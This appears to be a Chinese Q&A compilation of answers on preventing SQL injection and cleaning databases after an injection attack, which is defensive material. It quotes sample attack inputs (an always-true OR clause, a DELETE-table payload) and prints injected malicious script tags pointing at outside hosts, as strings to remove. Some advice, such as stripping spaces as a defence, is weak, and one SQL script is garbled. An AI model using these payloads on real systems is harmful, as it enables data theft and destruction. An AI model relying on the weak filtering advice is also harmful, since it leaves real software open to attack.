it碼被sql注入怎麼解決

㈠ 伺服器被sql注入，有沒有什麼解決方法

（簡單又有效的方法）PreparedStatement
採用預編譯語句集，它內置了處理SQL注入的能力，只要使用它的setXXX方法傳值即可。
使用好處：
(1).代碼的可讀性和可維護性.
(2).PreparedStatement盡最大可能提高性能.
(3).最重要的一點是極大地提高了安全性.
原理：
sql注入只對sql語句的准備(編譯)過程有破壞作用
而PreparedStatement已經准備好了,執行階段只是把輸入串作為數據處理,
而不再對sql語句進行解析,准備,因此也就避免了sql注入問題.

㈡ 如何解決SQL注入漏洞

要防止SQL注入其實不難，你知道原理就可以了。
所有的SQL注入都是從用戶的輸入開始的。如果你對所有用戶輸入進行了判定和過濾，就可以防止SQL注入了。用戶輸入有好幾種，我就說說常見的吧。
文本框、地址欄里***.asp?中？號後面的id=1之類的、單選框等等。一般SQL注入都用地址欄里的。。。。如果要說怎麼注入我想我就和上面的這位「仁兄」一樣的了。
你只要知道解決對嗎？
對於所有從上一頁傳遞過來的參數，包括request.form 、request.qurrystring等等進行過濾和修改。如最常的***.asp?id=123 ，我們的ID只是用來對應從select 里的ID，而這ID一般對應的是一個數據項的唯一值，而且是數字型的。這樣，我們只需把ID的值進行判定，就可以了。vbs默認的isnumeric是不行的，自己寫一個is_numeric更好，對傳過來的參數進行判定，OK，搞定。演算法上的話，自己想想，很容易了。但是真正要做到完美的話，還有很多要計算的。比如傳遞過來的參數的長度，類型等等，都要進行判定。還有一種網上常見的判定，就是判定傳遞參數的那一頁（即上一頁），如果是正常頁面傳弟過來就通過，否則反之。也有對' or 等等進行過濾的，自己衡量就可以了。注意一點就是了，不能用上一頁的某一個不可見request.form("*")進行判定，因為用戶完全可以用模擬的形式「復制」一個和上一頁完全一樣的頁面來遞交參數。

㈢ 解決並清除SQL被注入

在SQL查詢分析器執行以下代碼就可以了。
declare
@t
varchar(255),@c
varchar(255)
declare
table_cursor
cursor
for
select
a.name,b.name
from
sysobjects
a,syscolumns
b
,systypes
c
where
a.id=b.id
and
a.xtype='u'
and
c.name
in
('char',
'nchar',
'nvarchar',
'varchar','text','ntext')
declare
@str
varchar(500),@str2
varchar(500)
set
@str='<script
src=http://r01.3322.org/c.js></script>'/*要替換的內容*/
set
@str2=''
open
table_cursor
fetch
next
from
table_cursor
into
@t,@c
while(@@fetch_status=0)
begin
exec('update
['
+
@t
+
']
set
['
+
@c
+
']=replace(cast(['
+
@c
+
']
as
varchar(8000)),'''+@str+''','''+
@str2
+''')')
fetch
next
from
table_cursor
into
@t,@c
end
close
table_cursor
deallocate
table_cursor;
首先替換代碼裡面的<script
src=http://r01.3322.org/c.js></script>為你的資料庫表裡面被注入的內容，打開MSSQL的SQL查詢分析器執行以下代碼就可以了。

㈣ 現在對sql注入的問題主要的解決方法是什麼

這個方法雖然好，但分不出大小寫也是白搭 其實 只要過濾掉空格就可以了。
然後 自己設計的時候定義一下 傳遞的參數中間不能有空格：
比如 ID 當然不能有空格啦 分類 也不會有空格 呵呵

最簡單的防注入代碼：
<%
function mysql(mylist)
mylist=trim(mylist)
mylist=replace(mylist,"%20","")
mylist=replace(mylist," ","")
mysql=mylist
end function
%>

然後每次調用的時候 直接在頁面上加入：
id=mysql(request("id")) 等參數

我想 不管他們用什麼代碼，如果少了" "空格 Sql 語句就不可能正常運行，也就注入進去了吧。。。。

個人的淺見。。麻煩是麻煩了一點 但對於小網站 也就幾個頁面要這樣子 也無所謂了。。。。

如果誰有發現什麼漏動，請回復告知。謝謝

㈤ SQL注入攻擊與防範

關於SQL注入攻擊與防範

隨著網路的普及，關系資料庫的廣泛應用，網路安全越來越重要。下面是我為大家搜索整理了關於SQL注入攻擊與防範，歡迎參考閱讀，希望對大家有所幫助。想了解更多相關信息請持續關注我們應屆畢業生培訓網!

一、 SQL注入攻擊

簡言之，SQL注入是應用程序開發人員未預期地把SQL代碼傳入到應用程序的過程。它由於應用程序的糟糕設計而成為可能，並且只有那些直接使用用戶提供的值構建SQL語句的應用程序才會受影響。

例如：用戶輸入客戶ID後，GridView顯示客戶的全部行記錄。在一個更加真實的案例中，用戶還要輸入密碼之類的驗證信息，或者根據前面的登錄頁面得到用戶ID，可能還會有一些用戶輸入關鍵信息的文本框，如訂單的日期范圍或產品名稱。問題在於命令是如何被執行的。在這個示例中，SQL語句通過字元串構造技術動態創建。文本框txtID的值被直接復制到字元串中。下面是代碼：

在這個示例中，攻擊者可以篡改SQL語句。通常，攻擊的第一個目標是得到錯誤信息。如果錯誤沒有被恰當處理，底層的信息就會暴露給攻擊者。這些信息可用於進一步攻擊。

例如，想像一下在文本一下在文本框中輸入下面的字元串會發生什麼?

ALFKI'OR '1'='1

再看看因此生成的完整SQL語句：

這條語句將返回所有的訂單記錄，即便那些訂單不是由ALFDI創建，因為對每一行而言而有信1=1總是true。這樣產生的後果是沒有顯示當前用戶特定信息，卻向攻擊者顯示了全部資料，如果屏幕上顯示的是敏感信息，如社會保險號，生日或信用卡資料，就會帶來嚴重的問題。事實上，這些簡單的SQL注入往往是困擾那些大型電子商務公司的麻煩。一般而言，攻擊點不在於文本框而在於查詢字元串(可被用於向資料庫傳送值，如列表頁向詳細信息頁面傳送唯一標識符)。

還可以進行更復雜的攻擊。例如，攻擊者可以使用兩個連接號(--)注釋掉SQL語句的剩餘部分。這樣的攻擊只限於SQL Server，不過對於其他類型的資料庫也有等效的辦法，如MySql使用(#)號，Oracle使用(;)號。另外攻擊者還可以執行含有任意SQL語句的批處理命令。對於SQL Server提供程序，攻擊者只需在新命令前加上分號(;)。攻擊者可以採用這樣的方式刪除其他表的內容，甚至調用SQL Server的系統存儲過程xp_cmdshell在命令執行任意的程序。

下面是攻擊者在文本框中輸入的，它的攻擊目標是刪除Customers表的全部行。

LUNCHUN』;DELETE*FROM Customers--

二、防範

如何預防SQL注入攻擊呢?需要記住幾點。首先，使用TextBox.MaxLength屬性防止用戶輸入過長的字元是一個好辦法。因為它們不夠長，也就減少了貼入大量腳本的可能性。其次，要使用ASP.NET驗證控制項鎖定錯誤的數據(如文本、空格、數值中的特殊字元)。另外，要限制錯誤信息給出的提示。捕獲到資料庫異常時，只顯示一些通用的信息(如「數據源錯誤」)而不是顯示Exception.Message屬性中的信息，它可能暴露了系統攻擊點。

更為重要的是，一定要小心去除特殊字元。比如，可以將單引號替換為兩個單引號，這樣它們就不會和SQL語句的分隔符混淆：

string ID=txtID.Text().Replace(「』」，」』』」);

當然，如果文本確實需要包含單引號，這樣做就引入了其他麻煩。另外，某些SQL注入攻擊還是可行的。替換單引號可以防止用戶提前結束一個字元串，然而，如果動態構建含有數值的SQL語句，SQL注入攻擊又有發揮的空間了。這個漏洞常被(這是很危險的)忽視。更好的解決辦法是使用參數化的命令或使用存儲過程執行轉義以防止SQL注入攻擊。

另一個好建議是限制用於訪問資料庫的賬號的許可權。這樣該賬號將沒有許可權訪問其他資料庫或執行擴展的存儲過程。不過這樣並不能解決SQL腳本注入的問題，因為用於連接資料庫的進程幾乎總是需要比任意單個用戶更大的許可權。通過限制許可權，可以預防刪除表的攻擊，但不能阻止攻擊者偷看別人的.信息

三、POST注入攻擊

精明的用戶可能會知道還有另外一個Web控制項攻擊的潛在途徑。雖然參數化的命令防止了SQL注入攻擊，但它們不能阻止攻擊者向回發到伺服器的數據添加惡意的值。如果不檢查這些值，就使得攻擊者可以提交本來不可能存在的控制項值。

例如，假設你有一個顯示當前用戶訂單的列表。狡詐的攻擊者可能保存該頁面的一個本地副本，修改HTML內容向列表添加更多的項目，然後選擇某個「假」的項目。如果攻擊成功，攻擊者就能夠看到其他用戶訂單，這顯然是一個問題。幸好，ASP.NET使用一個很少被提及的叫做「事件驗證」的特性來防止這種攻擊。事件驗證檢查回發到伺服器的數據並驗證其中值的合法性。例如，如果回發的數據表明用戶選擇了一個沒有意義的數據(因為它在控制項中並不存在)，ASP.NET就產生一個錯誤並停止處理。可以在Page指令中設置EnableEventValidation特性為false來禁用事件驗證。創建使用客戶端腳本動態改變內容的頁面時，需要執行這一步。不過，此時在使用這些值之前要注意檢查潛在的POST注入攻擊。

㈥ 什麼是sql注入如何防止sql注入

SQL注入是一種非常常見的資料庫攻擊手段，同時也是網路世界中最普遍的漏洞之一，簡單理解就是惡意用戶通過在表單中填寫包含SQL關鍵字的數據來使資料庫執行非常規代碼的過程。
問題來源是，SQL資料庫的操作是通過SQL語句來執行的，而無論是執行代碼還是數據項都必須寫在SQL語句中，也就導致如果我們在數據項中加入了某些SQL語句關鍵字，比如SELECT、DROP等，這些關鍵字就很有可能在資料庫寫入或讀取數據時得到執行。
解決方案
方案一：
採用預編譯技術
使用預編譯的SQL語句，SQL語句的語義不會是不會發生改變的。預編譯語句在創建的時候就已經將指定的SQL語句發送給了DBMS，完成了解析，檢查，編譯等工作，所以攻擊者無法改變SQL語句的結構，只是把值賦給?，然後將?這個變數傳給SQL語句。當然還有一些通過預編譯繞過某些安全防護的操作，大家感興趣可以去搜索一下。
方案二：
嚴格控制數據類型
在java、c等強類型語言中一般是不存在數字型注入的，因為在接受到用戶輸入id時，代碼一般會做一個int id 的數據類型轉換，假如我們輸入的是字元串的話，那麼這種情況下，程序就會報錯。但是在PHP、ASP這些沒有強調處理數據類型的語言，一般我們看到的接收id的代碼都是如下等代碼。
方案三：
對特殊的字元進行轉義
數字型注入可以通過檢查數據類型防止，但是字元型不可以，那麼怎麼辦呢，最好的辦法就是對特殊的字元進行轉義了。比如在MySQL中我們可以對" '
"進行轉義，這樣就防止了一些惡意攻擊者來閉合語句。當然我們也可以通過一些安全函數來轉義特殊字元。如addslashes()等，但是這些函數並非一勞永逸，攻擊者還可以通過一些特殊的方式繞過。

㈦ 網站資料庫被SQL注入後應該怎麼辦

之前做過了一個網站，由於沒有對頁面參數進行驗證，掛上去沒多長時間就被人掛馬了，資料庫的每個表每個欄位內容里都被注入了一段代碼，什麼在資料庫中還新建了自己的表，真是太囂張了，但是這么多內容是不可能手動去刪除的，解決過程如下

一、首先刪除資料庫被注入的代碼

如統一刪除<script src=http://3b3.org/c.js> </script> （此適用於sql server）

DECLAREhCForEachCURSORGLOBAL
FOR
SELECTN'update'+QUOTENAME(o.name)
+N'set'+QUOTENAME(c.name)+N'=replace(CAST('+QUOTENAME(c.name)+'asvarchar(8000)),''<scriptsrc=http://3b3.org/c.js></script>'','''')'
FROMsysobjectso,syscolumnsc,systypest
WHEREo.id=c.id
ANDOBJECTPROPERTY(o.id,N'IsUserTable')=1
ANDc.xusertype=t.xusertype
AND(t.name='varchar'ort.name='ntext')
EXECsp_MSforeach_Worker@command1=N'?'

注意這樣刪除之後 ntext欄位將被截斷成8000個字元 導致數據丟失，當然其實在sql注入之前這種欄位屬性已經被截斷了，所以在刪除這些之後還要進行數據恢復但是 網站被掛馬往往是隨機的不知道什麼時候 我們可能沒有做及時的備份，無法恢復

這時候我們可以考慮從資料庫日誌進行恢復

1，如果誤操作之前存在一個全庫備份（或已有多個差異備份或增量備份），首先要做的事就是進進行一次日誌備份（如果為了不讓日誌文件變大而置trunc. log on chkpt.選項為1那你就死翹了）

backuplogdbNametodisk='fileName'

2，恢復一個全庫備份，注意需要使用with norecovery，如果還有其他差異或增量備份，則逐個恢復

restoredatabasedbNamefromdisk='fileName'withnorecovery

3，恢復最後一個日誌備份即剛做的日誌備份，指定恢復時間點到誤操作之前的時刻

restorelogdbNamefromdisk='fileName'
withstopat='date_time'

最後就是把網站的漏洞補上 對參數進行過濾

㈧ SQL注入怎麼防範

SQL注入攻擊的危害很大，而且防火牆很難對攻擊行為進行攔截，主要的SQL注入攻擊防範方法，具體有以下幾個方面：
1、分級管理
對用戶進行分級管理，嚴格控制用戶的許可權，對於普通用戶，禁止給予資料庫建立、刪除、修改等相關許可權，只有系統管理員才具有增、刪、改、查的許可權。
2、參數傳值
程序員在書寫SQL語言時，禁止將變數直接寫入到SQL語句，必須通過設置相應的參數來傳遞相關的變數。從而抑制SQL注入。數據輸入不能直接嵌入到查詢語句中。同時要過濾輸入的內容，過濾掉不安全的輸入數據。或者採用參數傳值的方式傳遞輸入變數，這樣可以最大程度防範SQL注入攻擊。
3、基礎過濾與二次過濾
SQL注入攻擊前，入侵者通過修改參數提交and等特殊字元，判斷是否存在漏洞，然後通過select、update等各種字元編寫SQL注入語句。因此防範SQL注入要對用戶輸入進行檢查，確保數據輸入的安全性，在具體檢查輸入或提交的變數時，對於單引號、雙引號、冒號等字元進行轉換或者過濾，從而有效防止SQL注入。
當然危險字元有很多，在獲取用戶輸入提交參數時，首先要進行基礎過濾，然後根據程序的功能及用戶輸入的可能性進行二次過濾，以確保系統的安全性。
4、使用安全參數
SQL資料庫為了有效抑制SQL注入攻擊的影響。在進行SQLServer資料庫設計時設置了專門的SQL安全參數。在程序編寫時應盡量使用安全參數來杜絕注入式攻擊，從而確保系統的安全性。
5、漏洞掃描
為了更有效地防範SQL注入攻擊，作為系統管理除了設置有效的防範措施，更應該及時發現系統存在SQL攻擊安全漏洞。系統管理員可以采購一些SQL漏洞掃描工具，通過專業的掃描工具，可以及時的掃描到系統存在的相應漏洞。
6、多層驗證
現在的網站系統功能越來越龐大復雜。為確保系統的安全，訪問者的數據輸入必須經過嚴格的驗證才能進入系統，驗證沒通過的輸入直接被拒絕訪問資料庫，並且向上層系統發出錯誤提示信息。同時在客戶端訪問程序中驗證訪問者的相關輸入信息，從而更有效的防止簡單的SQL注入。但是如果多層驗證中的下層如果驗證數據通過，那麼繞過客戶端的攻擊者就能夠隨意訪問系統。因此在進行多層驗證時，要每個層次相互配合，只有在客戶端和系統端都進行有效的驗證防護，才能更好地防範SQL注入攻擊。
7、資料庫信息加密
傳統的加解密方法大致分為三種：對稱加密、非對稱加密、不可逆加密。